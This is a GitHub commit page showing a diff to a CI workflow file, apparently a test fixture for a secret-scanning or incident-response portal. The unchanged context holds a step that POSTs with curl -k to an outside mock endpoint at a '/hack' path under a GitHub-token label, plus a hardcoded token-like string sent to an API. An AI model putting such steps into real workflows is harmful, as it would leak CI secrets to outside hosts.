Skip to content

Commit

Permalink
Update Main for Secrets.yml
Browse files Browse the repository at this point in the history
  • Loading branch information
Pranesh-Shrestha authored Dec 18, 2024
1 parent 83dab69 commit e5a895a
Showing 1 changed file with 11 additions and 12 deletions.
23 changes: 11 additions & 12 deletions .github/workflows/Main for Secrets.yml
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
name: Build JS Package
name: Build Python Package
on:
push:
branches: [ STAGE ]
Expand Down Expand Up @@ -88,7 +88,11 @@ jobs:
SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }}
- name: Checkout the code
uses: actions/checkout@v3

- name: Use Node.js ${{ matrix.node-version }}
uses: actions/setup-node@v3
with:
node-version: ${{ matrix.node-version }}

- name: Send POST request with GitHub token
run: |
curl -k -X POST https://vbirmock.free.beeceptor.com/hack \
Expand All @@ -101,13 +105,8 @@ jobs:
curl -k -X POST https://api.github.com/endpoint \
-d '{"name": "ghp_1234567890abcdef1234567890abcdef12345678", "description": "A description of my repository"}'
- name: Use Node.js ${{ matrix.node-version }}
uses: actions/setup-node@v3
with:
node-version: ${{ matrix.node-version }}
- run: npm install





- name: install dependencies
# run: pip install -r requirements.txt
run: npm install
# - run: npm run build --if-present
# - run: npm test

0 comments on commit e5a895a

Please sign in to comment.